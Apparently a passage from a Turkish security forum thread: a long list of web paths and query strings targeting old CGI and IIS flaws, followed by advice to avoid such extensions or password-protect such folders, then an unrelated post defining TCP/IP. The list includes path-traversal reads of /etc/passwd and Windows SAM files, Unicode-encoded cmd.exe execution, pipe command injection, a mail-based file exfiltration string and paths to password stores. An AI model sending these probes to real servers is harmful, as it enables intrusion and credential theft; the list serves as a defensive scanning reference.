    /cgi-bin/htmlscript
    /cgi-bin/htmlscript?../../../../../../etc/passwd
    /cgi-bin/htsearch
    /cgi-bin/htsearch?exclude=%60%60
    /cgi-bin/icat
    /cgi-bin/iisadmpwd/achg.htr
    /cgi-bin/iisadmpwd/aexp2.htr
    /cgi-bin/iisadmpwd/aexp.htr
    /cgi-bin/iisadmpwd/anot.htr
    /cgi-bin/imagemap
    /cgi-bin/imagemap.c
    /cgi-bin/imagemap.exe
    /cgi-bin/imapcern.exe
    /cgi-bin/imapncsa.exe
    /cgi-bin/info2html
    /cgi-bin/info2www
    /cgi-bin/info2www?(../../../../../../../bin/mail riotnation@hotmail.com+c:InetPubwwwrootcmd.pl+&+.p l
    /perl.exe
    /perl/files.pl
    /perlshop.cgi
    /pfdisplay.cgi
    /phf
    /photoads/
    /photoads/cgi-bin/
    /photoads/cgi-bin/env.cgi
    /.photon/voyager/config.full
    /php.cgi
    /phpgroupware/inc/phpgwapi/phpgw.inc.php
    /phpPhotoAlbum/getalbum.php?album=../../../etc/
    /ping all
    /ping?SomeCrapHere
    /piranha/secure/passwd.php3
    /piranha/secure/passwd.php3?username=piranha&passwd=q
    /pollit
    /Poll_It_SSI_v2.0.cgi
    /Poll_It_v2.0.cgi
    /post16.exe
    /ppwb/Temp/
    /ppwd
    /prd.i/pgen/
    /printenv
    /_private
    /_private/form_results.htm
    /_private/form_results.txt
    /_private/orders.htm
    /_private/orders.txt
    /_private/orders.txt
    /_private/register.htm
    /_private/register.txt
    /_private/register.txt
    /_private/registrations.htm
    /_private/registrations.txt
    /_private/shopping_cart.mdb
    /products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
    /pservlet.html
    /PSUser/PSCOErrPage.htm
    /publisher/
    /pw/storemgr.pw
    /quikstore.cfg
    /random_banner/index.cgi?image_list=alternative_image.list&html_f ile=../../../../../etc/hosts
    /random_banner/index.cgi?image_list=alternative_image.list&html_f ile=|ls%20-la|
    /redir.cgi
    /redirect.cgi
    /redirect.pl
    /redir.pl
    /repost.asp
    /rguest.exe
    /robots.txt
    /~root
    /~root/
    /root/
    /rpm_query
    /rsh
    /rwwwshell.pl
    /s97_cgi.exe
    /s_97.vts
    /sam._
    /samples/
    /samples/search/queryhit.htm
    /~sbin/
    /script/
    /scripts
    /scripts/
    /scripts/alibaba.pl|dir
    /scripts/args.bat
    /scripts/args.cmd
    /scripts/awl/auctionweaver.pl
    /scripts/bdir.htr
    /scripts/bigconf.cgi
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
    /scripts/c32web.exe/ChangeAdminPassword
    /scripts/Carello/add.exe
    /scripts/cart32.exe/cart32clientlist
    /scripts/cart32.exe/cart32clientlist?passwd=wemilo
    /scripts/CGImail.exe
    /scripts/cgimail.exe
    /scripts/Cgitest.exe
    /scripts/../../cmd.exe
    /scripts/cmd.exe
    /scripts/../../cmd.exe?%2FC+echo+”hacked!”>c:hello.bat
    /scripts/convert.bas
    /scripts/counter.exe
    /scripts/cpshost.dll
    /scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:
    /scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:
    /scripts/dbman/db.cgi?db=invalid-db
    /scripts/dbman/db.cgi?db=tedb
    /scripts/dbmlparser.exe
    /scripts/emurl/RECMAN.dll
    /scripts/emurl/RECMAN.dll?
    /scripts/excite
    /scripts/files.pl
    /scripts/foo.cmd?xxx&dir
    /scripts/Fpadmcgi.exe
    /scripts/fpcount.exe
    /scripts/fpexplorer.exe
    /scripts/get32.exe|dir
    /scripts/GW5/GWWEB.EXE
    /scripts/htimage.exe
    /scripts/iisadmin/bdir.htr
    /scripts/iisadmin/bdir.htr?dir=ht??c:
    /scripts/iisadmin/default.htm
    /scripts/iisadmin/ism.dll
    /scripts/iisadmin/ism.dll%3fhttp/dir
    /scripts/iisadmin/ism.dll?http/dir
    /scripts/iisadmin/ism.dll?http/dir%20…./
    /scripts/iisadmin/samples/ctgestb.htx
    /scripts/iisadmin/samples/ctgestb.idc
    /scripts/iisadmin/samples/details.htx
    /scripts/iisadmin/samples/details.idc
    /scripts/iisadmin/samples/query.htx
    /scripts/iisadmin/samples/query.idc
    /scripts/iisadmin/samples/register.htx
    /scripts/iisadmin/samples/register.idc
    /scripts/iisadmin/samples/sample2.htx
    /scripts/iisadmin/samples/sample.htx
    /scripts/iisadmin/samples/sample.idc
    /scripts/iisadmin/samples/viewbook.htx
    /scripts/iisadmin/samples/viewbook.idc
    /scripts/iisadmin/tools/ct.htx
    /scripts/iisadmin/tools/ctss.idc
    /scripts/iisadmin/tools/dsnform.exe
    /scripts/iisadmin/tools/getdrvrs.exe
    /scripts/iisadmin/tools/mkilog.exe
    /scripts/iisadmin/tools/newdsn.exe
    /scripts/imagemap.exe
    /scripts/input2.bat
    /scripts/input.bat
    /scripts/issadmin/bdir.htr
    /scripts/mlog.html
    /scripts/mylog.html
    /scripts/no-such-file.pl
    /scripts/perl
    /scripts/perl?
    /scripts/perl.exe
    /scripts/pfieffer.bat
    /scripts/pfieffer.cmd
    /scripts/phpmlog.phtml
    /scripts/phpmylog.phtml
    /scripts/plusmail
    /scripts/postinfo.asp
    /scripts/process_bug.cgi
    /scripts/proxy/w3proxy.dll
    /scripts/pu3.pl
    /scripts/query?mss=../config
    /scripts/repost.asp
    /scripts/repost.asp
    /scripts/rguest.exe
    /scripts/run.exe
    /scripts/samples/ctguestb.idc
    /scripts/samples/details.idc
    /scripts/samples/search/author.idq
    /scripts/samples/search/filesize.idq
    /scripts/samples/search/filetime.idq
    /scripts/samples/search/queryhit.idq
    /scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm
    /scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm
    /scripts/samples/search/simple.idq
    /scripts/samples/search/webhits.exe
    /scripts/script.bat%3f&dir
    /scripts/script.cmd%3f&dir
    /scripts/scriptssnorkerz.bat
    /scripts/scriptssnorkerz.cmd
    /scripts/search.cgi?letter=……..winnt
    /scripts/slxweb.dll
    /scripts/slxweb.dll/admin
    /scripts/test.bat
    /scripts/test.exe
    /scripts/tools/dsnform.exe
    /scripts/tools/getdrvrs.exe
    /scripts/tools/getdrvs.exe
    /scripts/tools/mkilog.exe
    /scripts/tools/newdsn.exe
    /scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:web.mdb&newdb=CREA TE_DB&attr=
    /scripts/tst.bat|dir
    /scripts/upload.asp
    /scripts/upload.asp
    /scripts/uploader.exe
    /scripts/uploadn.asp
    /scripts/uploadx.asp
    /scripts/visadmin.exe
    /scripts/wa.exe
    /scripts/webbbs.exe
    /scripts/wguest.exe
    /scripts/win-c-sample.exe
    /scripts/wsisa.dll
    /scripts/wsisa.dll/WService=anything?WSMadmin
    /search
    /search%3f
    /search97/s97_cgi.exe
    /search97/search97.vts
    /search97.vts
    /search.dll
    /search.dll?search?query=%00&logic=AND
    /search/iaquery.exe%3f
    /secret/index.htm
    /secret/index.html
    /secure/.htaccess
    /secure/.wwwacl
    /server%20logfile
    /server-status
    /service.pwd
    /servlet/
    /servlet/file
    /servlet/SessionServlet
    /servlet/test/pathInfo/test
    /servlet/viewsource.jsp
    /session/adminlogin
    /session/adminlogin?RCpage=/sysadmin/index.stm
    /session/admnlogin
    /shopper.conf
    /shop.pl
    /showcode.asp
    /showfile.asp
    /*.shtml/
    /shtml.exe
    /site.csc
    /site/eg/source.asp
    /siteman000510/siteman.php3
    /smdata.dat
    /SPSamp/AdvWorks/equipment/catalog_type.asp
    /srchadm
    /ss.cfg
    /ssi/envout.bat
    /startstop.html?.cfm
    /stat/
    /stats/
    /status
    /store/
    /submit.php
    /subscribe.pl
    /suche%3f
    /survey
    /survey.cgi
    /tcsh
    /~test
    /test
    /test%2ejsp
    /test.bat
    /test-cgi
    /test.jsp..
    /test.jsp../
    /test.php3
    /textcounter.pl
    /~tmp
    /~tmp/
    /today.nsf
    /today.nsf/
    /tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%2 8*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq= ..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&a ttr=
    /tree.dat
    /tst.bat
    /ubb/cgi-bin/postings.cgi
    /unlg1.1
    /update/
    /update.cgi
    /update.pl
    /upload/
    /uploader.exe
    /uploadx.asp
    /~usr/
    /usr/local/apache/share/htdocs/.htaccess
    /usr/local/apache/share/htdocs/.htaccess
    /usr/openwin/bin/kcms_configure
    /~uucp/
    /~var/
    /viewcode.asp
    /view-source
    /viewsource.jsp
    /visadmin.exe
    /_vti_bin
    /_vti_bin/fpcount.exe
    /_vti_bin/shtml.dll
    /_vti_bin/shtml.dll/tstt.htm
    /_vti_bin/shtml.exe
    /_vti_bin/_vti_adm
    /_vti_bin/_vti_adm/admin.dll
    /_vti_bin/_vti_aut
    /_vti_bin/_vti_aut/author.dll
    /_vti_bin/_vti_aut/dvwssr.dll
    /_vti_bin/_vti_aut/mtd2lv.dll
    /__vti_inf.html
    /_vti_inf.html
    /_vti_log/author.log
    /_vti_pvt
    /_vti_pvt/access.cnf
    /_vti_pvt/administrator.pwd
    /_vti_pvt/administrators.pwd
    /_vti_pvt/admin.pwd
    /_vti_pvt/author.log
    /_vti_pvt/authors.pwd
    /_vti_pvt/authors.pwd
    /_vti_pvt/service.cnf
    /_vti_pvt/service.grp
    /_vti_pvt/service.pwd
    /_vti_pvt/service.pwd
    /_vti_pvt/services.cnf
    /_vti_pvt/service.stp
    /_vti_pvt/shtml.dll
    /_vti_pvt/shtml.exe
    /_vti_pvt/svcacl.cnf
    /_vti_pvt/users.pwd
    /_vti_pvt/writeto.cnf
    /_vti_pwd/administrators.pwd
    /w3proxy.dll
    /webcart/
    /webcart-lite/
    /webdist.cgi
    /webfind.exe
    /webgais
    /webplus
    /websendmail
    /WebShop/logs/cc.txt
    /WebShop/logs/ck.log
    /WebShop/templates/cc.txt
    /WebSTAR
    /Web_Store
    /wguest.exe
    /WhatsNew/
    /whois.cgi
    /win-c-sample.exe
    /windmail.exe
    /…./Windows/Admin.pwl
    /winnt
    /.”./.”./winnt/reapir/sam._%20.pl
    /../../../../../winnt/repair/sam._
    /……winnt
    epairsam._
    /wrap
    /WS_FTP.INI
    /WS_FTP.ini
    /ws_ftp.ini
    /www
    /.wwwacl
    /wwwboard
    /wwwboard.pl
    /wwwboard/wwwadmin.cgi
    /wwwboard/wwwadmin.pl
    /wwwboard/wwwboard.pl
    /.www.my.cnf
    /www-sql

    Bu Uzantıları Kullanmayın Veya Bu Gibi Klasörleri Hep Şifreli Tutun.

    #29355

    TCP/IP (Transmission Control Protocol/Internet Protocol), bilgisayarlar ile veri iletme/alma birimleri arasında organizasyonu sağlayan, böylece bir yerden diğerine veri iletişimini olanaklı kılan pek çok veri iletişim protokolüne verilen genel addır. (Yani, TCP/IP protokolleri bilgisayarlar arası veri iletişiminin kurallarını koyar). Bu protokollere örnek olarak, dosya alma/gönderme protokolü FTP (File Transfer Protocol),
    Elektronik posta iletişim protokolü SMTP (Simple Mail Transfer Protocol), TELNET protokolü (Internet üzerindeki başka bir bilgisayarda etkileşimli çalışma için geliştirilen *login* protokolü) verilebilir. Adını sıkça duyduğumuz WWW ortamında birbirine link objelerin iletilmesini sağlayan protokol ise Hyper Text Transfer Protocol (HTTP) olarak adlandırılmaktadır. TCP/IP protokolü aynı zamanda, diğer iletişim ağlarında da kullanılabilir. Özellikle pek çok farklı tipte bilgisayarı veya iş istasyonlarını birbirine bağlayan yerel ağlarda (LAN) kullanımı yaygındır.

15 yazı görüntüleniyor - 1 ile 15 arası (toplam 25)
  • Bu konuyu yanıtlamak için giriş yapmış olmalısınız.